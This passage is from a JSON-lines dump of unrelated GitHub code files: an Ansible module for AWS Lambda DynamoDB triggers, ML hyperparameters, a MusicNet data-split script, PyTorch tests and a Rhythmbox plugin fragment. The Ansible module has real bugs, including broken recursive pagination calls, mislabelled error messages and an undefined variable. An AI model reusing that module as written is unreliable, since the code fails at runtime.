PATH of resource. 
use \"/\" for root\n state: \"{{ item.state }}\"\n with_items: \"{{ project.api_gw }}\"\n- name: update [API RESOURCE] [METHOD]\n cr_apigw_set:\n apigw_type: \"method\"\n name: \"{{ item.name }}\" ##name of the API\n path: \"{{ item.path }}\"\n operationName: \"{{ item.operational_name }}\"\n requestParameters: \"{{ item.request_params }}\"\n requestModels: \"{{ item.request_models }}\"\n responseModels: \"{{ item.response_models }}\"\n authorizationScopes: \"{{ item.auth_scope }}\"\n authName: \"{{item.authName}}\"\n apiKeyRequired: \"{{ item.apiKeyRequired }}\"\n authorizationType: \"{{ item.authorizationType }}\"\n httpMethod: \"{{ item.httpMethod }}\" ##GET, POST, other...\n state: \"{{ item.state }}\"\n integration: \"{{ item.method_integration }}\"\n response: \"{{ item.method_response }}\"\n with_items: \"{{ project.api_gw }}\"\n'''\n\n\ntry:\n import boto3\n from botocore.exceptions import ClientError, MissingParametersError, ParamValidationError\n HAS_BOTO3 = True\n\n from botocore.client import Config\nexcept ImportError:\n import boto\n HAS_BOTO3 = False\ndir_path = os.path.dirname(__file__)\n#\n\n\ndef file_append(path, filename, msg):\n with open(\"%s/LOG-%s.txt\" % (path, filename), \"a\") as file:\n file.write(\"\\n%s\" % (msg))\n# create a policy given actionPolicy object\n\n\ndef cr_apigw(state, module, client, name=None, resource=None, actionPolicy=None, description=None):\n pName = name\n found = True\n\n return [pName], False if found else True\n\n\ndef resource_gen(module, client, pathPart, apiId, pId):\n try:\n resource = client.create_resource(restApiId=apiId, parentId=pId, pathPart=pathPart)\n except ClientError as e:\n module.fail_json(msg=\"[E] resource_gen failed - {0}\".format(e.response['Error']['Message']))\n return resource\n\n\ndef getAllResources(client, restApiId, position=None):\n rlist = []\n if position is None:\n response = client.get_resources(restApiId=restApiId, limit=500)\n else:\n response = client.get_resources(restApiId=restApiId, position=position, limit=500)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAllResources(client, restApiId, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef cr_dynamo_event(state, module, client, clientstreams, event_source, function_name, source_params):\n found = True\n streams = client.list_event_source_mappings(FunctionName=function_name)['EventSourceMappings']\n targetStream = None\n UUID = None\n eventObj = None\n for stream in streams:\n streamSource = stream['EventSourceArn']\n if event_source in streamSource:\n targetStream = streamSource\n UUID = stream['UUID']\n eventObj = stream\n break\n\n if state == 'absent': # delete\n if targetStream: # already missing skip\n try:\n client.delete_event_source_mapping(UUID=UUID)\n except ClientError as e:\n module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(event_source, e.response['Error']['Message']))\n\n else: # add\n params = eventObjConform(module, source_params)\n enabled = params['enabled']\n batch_size = params['batch_size']\n starting_position = params['starting_position']\n MaximumBatchingWindowInSeconds = params['MaximumBatchingWindowInSeconds']\n\n ParallelizationFactor = params['ParallelizationFactor']\n DestinationConfig = params['DestinationConfig']\n\n MaximumRecordAgeInSeconds = params['MaximumRecordAgeInSeconds']\n BisectBatchOnFunctionError = params['BisectBatchOnFunctionError']\n MaximumRetryAttempts = params['MaximumRetryAttempts']\n\n if not targetStream:\n 
table = event_source.split(\"/\")[-1]\n targetStream = getTableStream(state, module, clientstreams, table)\n if eventObj:\n if MaximumBatchingWindowInSeconds != eventObj['MaximumBatchingWindowInSeconds']:\n eventObj.update({\"MaximumBatchingWindowInSeconds\": MaximumBatchingWindowInSeconds})\n found = False\n if BisectBatchOnFunctionError != eventObj['BisectBatchOnFunctionError']:\n eventObj.update({\"BisectBatchOnFunctionError\": BisectBatchOnFunctionError})\n found = False\n if not found:\n try:\n client.update_event_source_mapping(**eventObj)\n except ClientError as e:\n module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(event_source, e.response['Error']['Message']))\n else:\n try:\n if 'StartingPositionTimestamp' in params:\n StartingPositionTimestamp = params['StartingPositionTimestamp']\n if StartingPositionTimestamp == 0 or StartingPositionTimestamp == '0':\n year = dtime.today().year\n StartingPositionTimestamp = dtime(year, 1, 1)\n else:\n StartingPositionTimestamp = dtime.utcfromtimestamp(StartingPositionTimestamp)\n else:\n year = dtime.today().year\n StartingPositionTimestamp = dtime(year, 1, 1)\n params_obj = {\"EventSourceArn\": targetStream, \"FunctionName\": function_name,\n \"Enabled\": enabled, \"BatchSize\": batch_size,\n \"MaximumBatchingWindowInSeconds\": MaximumBatchingWindowInSeconds,\n \"ParallelizationFactor\": ParallelizationFactor,\n \"StartingPosition\": starting_position,\n \"DestinationConfig\": DestinationConfig,\n \"MaximumRecordAgeInSeconds\": MaximumRecordAgeInSeconds,\n \"BisectBatchOnFunctionError\": BisectBatchOnFunctionError,\n \"MaximumRetryAttempts\": MaximumRetryAttempts\n\n }\n if starting_position == \"AT_TIMESTAMP\":\n params_obj.update({\"StartingPositionTimestamp\": StartingPositionTimestamp})\n\n client.create_event_source_mapping(**params_obj)\n found = False\n except ClientError as e:\n module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(event_source, e.response['Error']['Message']))\n\n return [event_source], False if found else True\n\n\ndef getTableStream(state, module, clientstreams, table):\n # dynoClient = boto3.client(\"dynamodbstreams\")\n streams = clientstreams.list_streams(TableName=table)['Streams']\n for stream in streams:\n return stream['StreamArn']\n\n\ndef eventObjConform(module, source_params):\n params = source_params\n\n enabled = params['enabled']\n # module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(enabled, params))\n\n batch_size = int(params['batch_size'])\n starting_position = params['starting_position']\n MaximumBatchingWindowInSeconds = int(params['MaximumBatchingWindowInSeconds'])\n\n ParallelizationFactor = int(params['ParallelizationFactor'])\n if ParallelizationFactor == 0:\n ParallelizationFactor = 1\n DestinationConfig = params['DestinationConfig']\n if isinstance(DestinationConfig, str):\n DestinationConfig = params['DestinationConfig']\n onfailure = False\n onsuccess = False\n if 'OnFailure' in DestinationConfig:\n if DestinationConfig['OnFailure']:\n onfailure = True\n if 'OnSuccess' in DestinationConfig:\n if DestinationConfig['OnSuccess']:\n onsuccess = True\n if not onsuccess and not onfailure:\n DestinationConfig = {}\n\n MaximumRecordAgeInSeconds = int(params['MaximumRecordAgeInSeconds'])\n if MaximumRecordAgeInSeconds == 0:\n MaximumRecordAgeInSeconds = 60000\n BisectBatchOnFunctionError = params['BisectBatchOnFunctionError']\n if BisectBatchOnFunctionError == 0 or BisectBatchOnFunctionError == '0':\n BisectBatchOnFunctionError 
= False\n else:\n BisectBatchOnFunctionError = True\n # module.fail_json(msg=\"[E] dynamo trigger DELETE failed {0} - {1}\".format(BisectBatchOnFunctionError, params))\n MaximumRetryAttempts = int(params['MaximumRetryAttempts'])\n\n obj = {\n \"enabled\": enabled,\n \"batch_size\": batch_size,\n \"starting_position\": starting_position,\n \"MaximumBatchingWindowInSeconds\": MaximumBatchingWindowInSeconds,\n \"ParallelizationFactor\": ParallelizationFactor,\n \"DestinationConfig\": DestinationConfig,\n \"MaximumRecordAgeInSeconds\": MaximumRecordAgeInSeconds,\n \"BisectBatchOnFunctionError\": BisectBatchOnFunctionError,\n \"MaximumRetryAttempts\": MaximumRetryAttempts\n }\n return obj\n\n\ndef cr_resource(state, module, client, name, path, description):\n found = True\n apiFound = api_exists(module, name, client)\n if apiFound is None:\n module.fail_json(msg=\"[E] cr_resource API name - {0} not found\".format(name))\n restApiId = apiFound[\"id\"]\n # rlist = client.get_resources( restApiId=restApiId, limit=500)['items']\n rlist = getAllResources(client, restApiId)\n # pId = None\n pathPart = path.rsplit('/', 1)[-1] # users\n parentPath = path.rsplit('/', 1)[-2]\n dictPath = {}\n for rs in rlist:\n parentID = pPart = None\n if 'parentId' in rs:\n parentID = rs['parentId']\n if 'pathPart' in rs:\n pPart = rs['pathPart']\n dictPath.update({rs['path']: {'pid': parentID, 'pathPart': pPart, 'id': rs['id']}})\n\n if pathPart == \"\" and pathPart == parentPath: # root update here so nothing required\n return [path], False if found else True\n if path in dictPath: # already exists. return without change\n return [path], False if found else True\n if parentPath == \"\": # root level so no update as needed\n for k, v in dictPath.items():\n rootPath = k.rsplit('/', 1)[-2]\n if path == rootPath: # root level CONFIRMED so no update as needed\n # # module.fail_json(msg=\"[T] cr_resource API - {0} set as\".format(found))\n return [path], False if found else True\n\n # module.fail_json(msg=\"[T] cr_resource API - {0}===={1}===={2}===={3} {4}\".format(dictPath,pathPart,parentPath,restApiId, path))\n\n sPath = path.split(\"/\")\n lastpath = \"\"\n lastId = dictPath['/']['id']\n attempts = len(sPath)\n found = False\n for n in range(attempts):\n if not sPath[n] == \"\":\n lastpath = lastpath + \"/\" + sPath[n]\n if lastpath in dictPath: # found ..update lastID and continue\n lastId = dictPath[lastpath]['id']\n continue\n rPart = lastpath.rsplit('/', 1)[-1]\n rsrc = resource_gen(module, client, rPart, restApiId, lastId)\n dictPath.update({lastpath: {'pid': lastId, 'pathPart': rPart, 'id': rsrc['id']}})\n lastId = rsrc['id']\n\n return [path], False if found else True\n\n\ndef getAll_rest_apis(client, position=None):\n rlist = []\n if position is None:\n response = client.get_rest_apis(limit=500)\n else:\n response = client.get_rest_apis(limit=500)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAll_rest_apis(client, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef api_exists(module, name, client):\n # client = boto3.client('apigateway')\n api = None\n # response = client.get_rest_apis( limit=450 )['items']\n response = getAll_rest_apis(client)\n for item in response:\n if item['name'].lower() == name.lower():\n #module.fail_json(msg=\"[T] name:'{0}' - '{1}' not found\".format(name,item['name']))\n api = item\n break\n return api\n\n\ndef resource_exists(module, path, apiId, client):\n resource = None\n # response = 
client.get_resources(restApiId=apiId, limit=450 )['items']\n response = getAllResources(client, apiId)\n # comparing=[]\n for item in response:\n # comparing.append(\"%s == %s\"%(path,item['path']))\n if item['path'].lower() == path.lower():\n resource = item\n break\n # module.fail_json(msg=\"[E] resource_exists API resource[{0}] - {1} \".format(resource, comparing ))\n return resource\n\n\ndef method_exists(module, method, apiId, rId, client):\n oMethod = None\n resource = client.get_resource(restApiId=apiId, resourceId=rId)\n if 'resourceMethods' in resource:\n for key, value in resource['resourceMethods'].items():\n if method.lower() == key.lower():\n # module.fail_json(msg=\"[E] method_exists API resource[{0}] - {1} \".format(key, resource ))\n oMethod = client.get_method(restApiId=apiId, resourceId=rId, httpMethod=key)\n del oMethod['ResponseMetadata']\n break\n # module.fail_json(msg=\"[T] method_exists API resource[{0}] {1}\".format( method, oMethod))\n return oMethod\n\n\ndef getAll_validators(client, restApiId, position=None):\n rlist = []\n if position is None:\n response = client.get_request_validators(restApiId=restApiId, limit=500)\n else:\n response = client.get_request_validators(restApiId=restApiId, limit=500, position=position)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAll_validators(client, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef validator_match(client, module, validator, restApiId):\n description = validator['name']\n validBody = validator['validateRequestBody']\n validReqParam = validator['validateRequestParameters']\n items = getAll_validators(client, restApiId)\n # module.fail_json(msg=\"[T] validator_match - {0} [{1}] {2}\".format( items, restApiId , validator))\n Found = None\n if items:\n for item in items:\n if validBody == item['validateRequestBody'] and validReqParam == item['validateRequestParameters'] and description == item['name']:\n return item\n response = client.create_request_validator(restApiId=restApiId,\n name=description,\n validateRequestBody=validBody,\n validateRequestParameters=validReqParam\n )\n return response\n\n\ndef getAll_authorizers(client, restApiId, position=None):\n rlist = []\n if position is None:\n response = client.get_authorizers(restApiId=restApiId, limit=500)\n else:\n response = client.get_authorizers(restApiId=restApiId, limit=500, position=position)\n baseList = response['items']\n if \"position\" in response:\n rlist = getAll_authorizers(client, response['position'], prevlist=[])\n final = baseList + rlist\n return final\n\n\ndef auth_present(client, module, authorizationName, restApiId):\n # items = client.get_authorizers(restApiId=restApiId)['items']\n items = getAll_authorizers(client, restApiId)\n for item in items:\n if authorizationName == item['name']:\n return item\n # module.fail_json(msg=\"[T] auth_present - {0} [{1}]\".format( items, restApiId ))\n # not found so fail\n return None\n\n\ndef model_present(client, module, model, apiId, update=True):\n old = None\n if model is None or not model:\n return old\n for mk, mv in model.items():\n if mv:\n if mv.lower() == \"empty\":\n return old\n\n modelName = None\n if 'name' in model:\n modelName = model['name']\n # module.fail_json(msg=\"[T] model_present models >>-> {0} \".format( model ) )\n if modelName is None:\n return None\n try:\n old = client.get_model(restApiId=apiId, modelName=modelName, flatten=True)\n if not old['schema'] in model['schema']:\n update = True\n else:\n nModel = 
old\n except ClientError as e:\n update = True\n if update:\n try:\n if not old is None:\n client.delete_model(restApiId=apiId, modelName=modelName)\n response = client.create_model(restApiId=apiId, name=modelName,\n description=model['description'],\n schema=model['schema'], contentType=model['contentType']\n )\n nModel = response\n except ClientError as e:\n module.fail_json(msg=\"[E] model_present failed - {0}\".format(e.response['Error']['Message']))\n return nModel\n\n\ndef cr_model(state, module, client, name, resource, description, apiId, schema, contentType):\n pName = name\n found = True\n try:\n obj = {'schema': schema, 'name': name, 'description': description, 'contentType': contentType}\n nModel = model_present(client, module, obj, apiId, True)\n found = False\n except ClientError as e:\n module.fail_json(msg=\"[E] model_present failed - {0}\".format(e.response['Error']['Message']))\n\n return [pName], False if found else True\n# isTest is not for Testing but to validate params are correct before CHANGE is made!!!!!\n# OTHERWISE YOU WILL LOOSE THE API FOREVER!!!!\n\n\ndef object_Method(name, description, httpMethod, integration, response, path, keyRequired, requestparameters, requestvalidator, authorizationType, authorizationName, requestModels, responseModels, operationName, authScopes, credentials):\n return type('obj', (object,), {\n \"name\": name,\n \"description\": description,\n \"httpMethod\": httpMethod,\n \"integration\": integration,\n \"response\": response,\n \"path\": path,\n \"keyRequired\": keyRequired,\n \"requestparameters\": requestparameters,\n \"requestvalidator\": requestvalidator,\n \"authorizationType\": authorizationType,\n \"authorizationName\": authorizationName,\n \"requestModels\": requestModels,\n \"responseModels\": responseModels,\n \"operationName\": operationName,\n \"authScopes\": authScopes,\n \"credentials\": credentials\n })\n\n\n# GET RESOURCE\n\n# CREATE RESOURCE\n# CREATE METHOD\n# CREATE USAGE PLAN\n# CREATE AUTHORIZER\n# CREATE DEPLOYMENT\n# CREATE MODEL\n# CREATE REQUEST VALIDATOR\n\n# . create_base_path_mapping\n\n# update_gateway_response()\n# update_integration()\n# update_integration_response()\n# update_method()\n# update_method_response()\n\n# ADD METHOD. put_method\n\n# WHAT LIMITS ARE ON TOTAL NUMBER OF STAGES\n# CREATE STAGE. 
(*CREATE ONLY ONE annd multiple usage plans PER customer)\n# CREATE API KEY (*requires stage to be deployed)\n\n# UPDATE AUTHORIZOR\n\n# TEST INVOKE METHOD\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(dict(\n # name=dict(required=True, default=None), # name of the API\n # apigw_type=dict(required=True, choices=['resource', 'method', 'method_response', 'integration', 'integration_response', 'model']),\n state=dict(required=True, choices=['present', 'absent']),\n # type_event=dict(required=True, choices=['s3', 'dynamodb', 'api', 'cloudwatch', 'sns', 'sqs', 'cloudfont', 'cognito', 'kinesis']),\n # description=dict(default=None, required=False),\n # api_key=dict(required=False, default=None, type='bool'),#Specifies whether the ApiKey can be used by callers\n # #########################\n # CREATE RESOURCE\n # #########################\n event_source=dict(required=True, default=None, type='str'),\n function_name=dict(required=True, default=None, type='str'),\n\n # stages=dict(default=None, required=False),\n source_params=dict(default=None, required=True, type='dict')\n\n\n )\n )\n\n module = AnsibleModule(argument_spec=argument_spec,\n supports_check_mode=True,\n mutually_exclusive=[], required_together=[]\n )\n\n # validate dependencies\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 is required for this module.')\n try:\n region, endpoint, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)\n aws_connect_kwargs.update(dict(region=region,\n endpoint=endpoint,\n conn_type='client',\n resource='lambda'\n ))\n\n resource = None\n # ecr = boto3_conn(module, conn_type='client', resource='ecr', region=region, endpoint=endpoint, **aws_connect_kwargs)\n # module.fail_json(msg=\" LOL cr_iam_profileo - {0}\".format('iprofile'))\n client = boto3_conn(module, **aws_connect_kwargs)\n aws_connect_kwargs.update(dict(region=region,\n endpoint=endpoint,\n conn_type='client',\n resource='dynamodbstreams'\n ))\n dynamodbstreams = boto3_conn(module, **aws_connect_kwargs)\n # resource=None\n # module.fail_json(msg=\" LOL cr_iam_profileo - {0}\".format('iprofile'))\n except botocore.exceptions.ClientError as e:\n module.fail_json(msg=\"Can't authorize connection - {0}\".format(e))\n except Exception as e:\n module.fail_json(msg=\"Connection Error - {0}\".format(e))\n# check if trust_policy is present -- it can be inline JSON or a file path to a JSON file\n\n state = module.params.get('state')\n type_event = module.params.get('type_event')\n event_source = module.params.get('event_source')\n if \":table/\" in event_source:\n type_event = 'dynamodb'\n\n # path = module.params.get('path').lower()\n function_name = module.params.get('function_name')\n source_params = module.params.get('source_params')\n\n choice_map = {\n \"dynamodb\": cr_dynamo_event,\n \"s3\": cr_dynamo_event,\n \"cloudwatch\": cr_dynamo_event\n }\n# [api','resource','method','method_response','integration','integration_response','stage','deployment','key','authorizer','model']\n # module.fail_json(msg=\"what is name - {0}\".format(name))\n\n if 'dynamodb' in type_event: # ** \"name\" ** is API name. 
(each env may have diff id)\n typeList, changed = choice_map.get(type_event)(state, module, client, dynamodbstreams, event_source, function_name, source_params)\n else:\n module.fail_json(msg=\"Sorry {0} not yet implemented\".format(delta_type))\n # typeList, changed = choice_map.get(delta_type)(module, client, name, trust_policy_doc, iam_role)\n\n # has_changed, result = choice_map.get(module.params['state'])(module.params)\n has_changed = changed\n\n module.exit_json(changed=has_changed, entities=typeList)\n\n\n# ansible import module(s) kept at ~eof as recommended\n\nfrom ansible.module_utils.basic import *\nfrom ansible.module_utils.ec2 import *\n\nif __name__ == '__main__':\n main()\n","repo_name":"brandonkgarner/CEDAR","sub_path":"ansible/library/cr_lambda_triggers.py","file_name":"cr_lambda_triggers.py","file_ext":"py","file_size_in_byte":26707,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"15420219746","text":"import tensorflow as tf\nimport constants.constants as const\n\n# words2vec\nW2V_EMBEDDING_SIZE = 128\nW2V_NEG_SAMPLES = 64\nW2V_SKIP_WORD_WINDOW = 1\nW2V_BATCH_SIZE = 100\nW2V_EPOCHS = 500\nW2V_EVAL_FRQ = 2\n\n\n# vid2sentence\n# data set params\nV2S_SENTENCE_MAX = 20\nV2S_FRAMES_MAX = 26\nV2S_MAX_HEIGHT = 128\nV2S_MAX_WIDTH = 128\nV2S_TFR_EX_NUM = 10000\nFRAME_SHAPE = (V2S_MAX_HEIGHT, V2S_MAX_WIDTH, 3)\n# optional, will be set automaticallyQ\nCNN_MODEL_SHAPE = (6, 6, 1536)\nV2S_BFLOAT16_MODE = False\n\n# hyper params\nV2S_BATCH_SIZE = 2\nV2S_EPOCHS_PER_EVAL = 1\nV2S_DROPOUT_RATE = 0.1\nV2S_LAYERS = 6\nV2S_NUM_MULT_HEADS = 8\nV2S_FF_HIDDEN_UNITS = 1024\nV2S_ACTIVATION = tf.nn.selu\n\n# optimizer params\nV2S_LBL_SMOOTHING = 0.1\nV2S_WEIGHT_MODE = const.WeightMode.Gauss\nV2S_OPTIMIZER_TYPE = const.OptimizerType.Adam\n\n# optimizer params - adam\nV2S_ADAM_BETA1 = 0.9\nV2S_ADAM_BETA2 = 0.999\nV2S_ADAM_EPSILON = 1e-08\n\n# optimizer params - adafactor\nV2S_ADAFACTOR_DECAY = None\nV2S_ADAFACTOR_BETA = 0.0\nV2S_ADAFACTOR_EPSILON1 = 1e-30\nV2S_ADAFACTOR_EPSILON2 = 1e-3\n\n# eval metric params\nV2S_MAX_N_GRAM = 4\n\n# early stopping params\nV2S_DELTA_VAL = 0.0001\nV2S_DELTA_STEP = 1300\nV2S_MIN_STEP = 0\n\n# tpu params\n# Number of training steps to run on the Cloud TPU before returning control.\nTPU_ITERATIONS = 100\n# A single Cloud TPU has 8 shards.\nTPU_NUM_SHARDS = 8\nTPU_ZONE = \"\"\nTPU_GCP_NAME = \"\"\nTPU_NAME = \"\"\nTPU_LOG_STEP = 1\nTPU_TRAIN_EXAMPLES_PER_EPOCH = 80000\nTPU_EVAL_EXAMPLES_PER_EPOCH = 6912\nTPU_TRAIN_BATCH_SIZE = 128 # 16\nTPU_EVAL_BATCH_SIZE = 128\nTPU_PREDICT_BATCH_SIZE = 128\nTPU_EPOCHS = 2\n\n# Jpg encoding\nJPG_SKIP = 10\nJPG_QUAL = 60\n\n# data pipeline\nPREFETCH_ELEMENTS = 1\nPARSER_PARALLEL_CALLS = 8\n\n# checkpoints\nSAVE_CHK_STEP = 500\nKEEP_CHK = 10\n\n# optical flow\nBRACKET = 5\nSKIP = 1\nBOUND = 15\nFLOW_RESIZE_FACTOR = 2 # needs to be 2^x\n\n# beam search\nALPHA = 0.6\n","repo_name":"MFizz/MultiheadAttentionConvHybrid","sub_path":"constants/hyper_params.py","file_name":"hyper_params.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"21224322530","text":"#ITP1_1_D: Watch\r\n#秒単位の時間 S が与えられるので、h:m:s の形式へ変換して出力してください。\r\n#ここで、h は時間、m は 60 未満の分、s は 60 未満の秒とします。\r\n#Write a program which reads an integer S [second] and converts it to h:m:s where h, m, s denote hours, minutes (less than 60) and seconds (less than 60) respectively.\r\nS = int(input())\r\nh = S // 3600\r\nm = S % 3600 // 60\r\ns = S % 60\r\nif(0<=S & S<=86400):\r\n print(f\"{h}:{m}:{s}\")\r\n","repo_name":"nerunerunerune/kenkyushitukadai","sub_path":"04.py","file_name":"04.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"8269303981","text":"from sklearn.model_selection import train_test_split\n\nfrom pymir import settings\n\nfrom pymir.common import EXISTING_KEYS\n\n\nimport csv\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\ndef generate_ds(test_fname, train_fname, test_size=0.2):\n\n musicnet_fname = (\n os.path.join(\n settings.DATA_DIR, 'musicnet', 'representations',\n 'sequence_of_notes', 'musicnet.csv'))\n\n songs = {}\n i = 0\n with open(musicnet_fname) as f:\n reader = csv.reader(f, delimiter=' ')\n for row in reader:\n if row[0] not in songs:\n songs[row[0]] = [row]\n else:\n songs[row[0]].append(row)\n i += 1\n\n train_list = []\n test_list = []\n\n for k in EXISTING_KEYS:\n if k in songs:\n df = pd.Series(songs[k])\n train, test = train_test_split(df, test_size=test_size)\n train_list.append(train)\n test_list.append(test)\n\n train = pd.concat(train_list)\n test = pd.concat(test_list)\n\n\n # generate train and test sets, first note in every line is key of the song\n\n with open(test_fname, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=' ')\n for a in test:\n writer.writerow(a)\n\n\n with open(train_fname, 'w') as csvfile:\n writer = csv.writer(csvfile, delimiter=' ')\n for a in train:\n writer.writerow(a)\n\ndef plot_train_test_data(test_fname, train_fname):\n test_keys = {}\n train_keys = {}\n\n with open(test_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n if row[0] in test_keys:\n test_keys[row[0]] +=1\n else:\n test_keys[row[0]] =1\n\n\n with open(train_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n if row[0] in train_keys:\n train_keys[row[0]] +=1\n else:\n train_keys[row[0]] =1\n\n test_keys_list = [\n test_keys[k] if k in test_keys else 0 for k in EXISTING_KEYS\n ]\n\n train_keys_list = [\n train_keys[k] if k in train_keys else 0 for k in EXISTING_KEYS\n ]\n\n ind = np.arange(len(EXISTING_KEYS)) # the x locations for the groups\n width = 0.35 # the width of the bars\n\n fig, ax = plt.subplots()\n train = ax.bar(ind, train_keys_list, width, color='r')\n test = ax.bar(ind + width, test_keys_list, width, color='y')\n\n # add some text for labels, title and axes ticks\n ax.set_ylabel('Frequency')\n ax.set_title('Keys frequency by set')\n ax.set_xticks(ind + width / 2)\n ax.set_xticklabels(EXISTING_KEYS, rotation=60)\n\n ax.legend((train[0], test[0]), ('Train Set', 'Test Set'))\n\n fname = (\n os.path.join(\n settings.IMG_DIR,\n 'key_detection', 'musicnet', 'train_test_keys_distribution.png'))\n\n ax.set_xticks(ind + width)\n plt.tight_layout()\n plt.savefig(fname)\n\ndef plot_ds_duration_by_song(test_fname, train_fname):\n durations = []\n\n with open(test_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n durations.append(len(row) - 1)\n\n with open(train_fname, 'r') as csvfile:\n reader = csv.reader(csvfile, delimiter=' ')\n for row in reader:\n durations.append(len(row) - 1)\n\n\n # the histogram of the data\n n, bins, patches = plt.hist(durations, 50, normed=0, facecolor='green', alpha=0.75)\n plt.grid(True)\n plt.xlabel('Songs')\n plt.ylabel('Probability')\n fname = (\n os.path.join(\n settings.IMG_DIR,\n 'key_detection', 'musicnet', 'sequence_len.png'))\n plt.tight_layout()\n plt.savefig(fname)\n\n\n\ndef compute(train_size=0.8):\n \"\"\"\n Splits musicnet dataset into train and test sets\n \"\"\"\n test_size = 1 - train_size\n\n test_fname = (\n os.path.join(settings.DATA_DIR, 
'musicnet', 'representations',\n 'sequence_of_notes', 'musicnet_test.csv'))\n\n train_fname = (\n os.path.join(settings.DATA_DIR, 'musicnet', 'representations',\n 'sequence_of_notes', 'musicnet_train.csv'))\n\n generate_ds(test_fname, train_fname, test_size=test_size)\n plot_train_test_data(test_fname, train_fname)\n plot_ds_duration_by_song(test_fname, train_fname)\n","repo_name":"mfranco/pymir","sub_path":"code/python/pymir/analytics/key_detection/musicnet/transformations/note_sequence_split.py","file_name":"note_sequence_split.py","file_ext":"py","file_size_in_byte":4373,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
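The per-key loop in generate_ds above is effectively a stratified split. scikit-learn can express the same intent in one call via the stratify argument; a toy sketch (the labels are illustrative, not musicnet data):

from sklearn.model_selection import train_test_split

songs = [f"song{i}" for i in range(10)]
keys = ["C"] * 5 + ["G"] * 5
# stratify preserves the key distribution across train and test.
train, test = train_test_split(songs, test_size=0.2, stratify=keys, random_state=0)
print(sorted(test))  # two test songs, one per key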
+{"seq_id":"72140284385","text":"\"\"\"Test training function data loaders.\"\"\"\n\n\nfrom warnings import warn\n\nimport torch\n\nfrom .runner_test import training_fn_on_device\n\n\ndef test_is_cuda_device_cpu():\n \"\"\"Test whether device is recognized as CPU.\"\"\"\n training = training_fn_on_device(use_gpu=False)()\n assert not training.is_device_cuda()\n\n\ndef test_is_cuda_device_gpu():\n \"\"\"Test whether device is recognized as CPU.\"\"\"\n if torch.cuda.is_available():\n training = training_fn_on_device(use_gpu=True)()\n assert training.is_device_cuda()\n else:\n warn(\"Could not find CUDA device\")\n\n\ndef test_pin_memory_in_data_loading_cpu():\n \"\"\"When training on CPU, data loaders need not use pinned memory.\"\"\"\n training = training_fn_on_device(use_gpu=False)()\n for loader in [\n training.load_test_set,\n training.load_training_set,\n training.load_training_loss_set,\n ]:\n assert not loader().pin_memory\n\n\ndef test_pin_memory_in_data_loading_gpu():\n \"\"\"When training on GPU, data loaders should use pinned memory.\"\"\"\n if torch.cuda.is_available():\n training = training_fn_on_device(use_gpu=True)()\n for loader in [\n training.load_test_set,\n training.load_training_set,\n training.load_training_loss_set,\n ]:\n assert loader().pin_memory\n else:\n warn(\"Could not find CUDA device\")\n","repo_name":"f-dangel/hbp","sub_path":"exp/training/training_test.py","file_name":"training_test.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"70"}
+{"seq_id":"30576739612","text":"from gi.repository import GObject\nfrom gi.repository import Gdk\nfrom gi.repository import GdkPixbuf\nfrom gi.repository import Gtk\nfrom gi.repository import Peas\nfrom gi.repository import RB\nfrom gi.repository import GLib\n\nfrom small_rb3compat import ActionGroup\nfrom small_rb3compat import Action\nfrom small_rb3compat import ApplicationShell\nfrom small_rb3compat import is_rb3\nimport rb\n\n\nui_string = \\\n \"\"\"\n \n \n \n \n \n \n \n \"\"\"\n\n\nclass SmallWindow(GObject.Object, Peas.Activatable):\n object = GObject.Property(type=GObject.Object)\n\n # Builder releated utility functions... ####################################\n\n def load_builder_content(self, builder):\n if ( not hasattr(self, \"__builder_obj_names\") ):\n self.__builder_obj_names = list()\n\n for obj in builder.get_objects():\n if ( isinstance(obj, Gtk.Buildable) ):\n name = Gtk.Buildable.get_name(obj).replace(' ', '_')\n self.__dict__[name] = obj\n self.__builder_obj_names.append(name)\n\n def connect_builder_content(self, builder):\n builder.connect_signals_full(self.connect_builder_content_func, self)\n\n def connect_builder_content_func(self,\n builder,\n object,\n sig_name,\n handler_name,\n conn_object,\n flags,\n target):\n handler = None\n\n h_name_internal = \"_sh_\" + handler_name.replace(\" \", \"_\")\n\n if ( hasattr(target, h_name_internal) ):\n handler = getattr(target, h_name_internal)\n else:\n handler = eval(handler_name)\n\n object.connect(sig_name, handler)\n\n def purge_builder_content(self):\n for name in self.__builder_obj_names:\n o = self.__dict__[name]\n if ( isinstance(o, Gtk.Widget) ):\n o.destroy()\n del self.__dict__[name]\n\n del self.__builder_obj_names\n\n # Plugins Methods... #######################################################\n\n def __init__(self):\n super(SmallWindow, self).__init__()\n\n def do_activate(self):\n # Basic Activation Procedure\n self.shell = self.object\n self.main_window = self.shell.props.window\n\n # Prepare internal variables\n self.song_duration = 0\n self.cover_pixbuf = None\n self.entry = None\n\n # Prepare Album Art Displaying\n self.album_art_db = GObject.new(RB.ExtDB, name=\"album-art\")\n\n # Build up actions.\n self.action_group 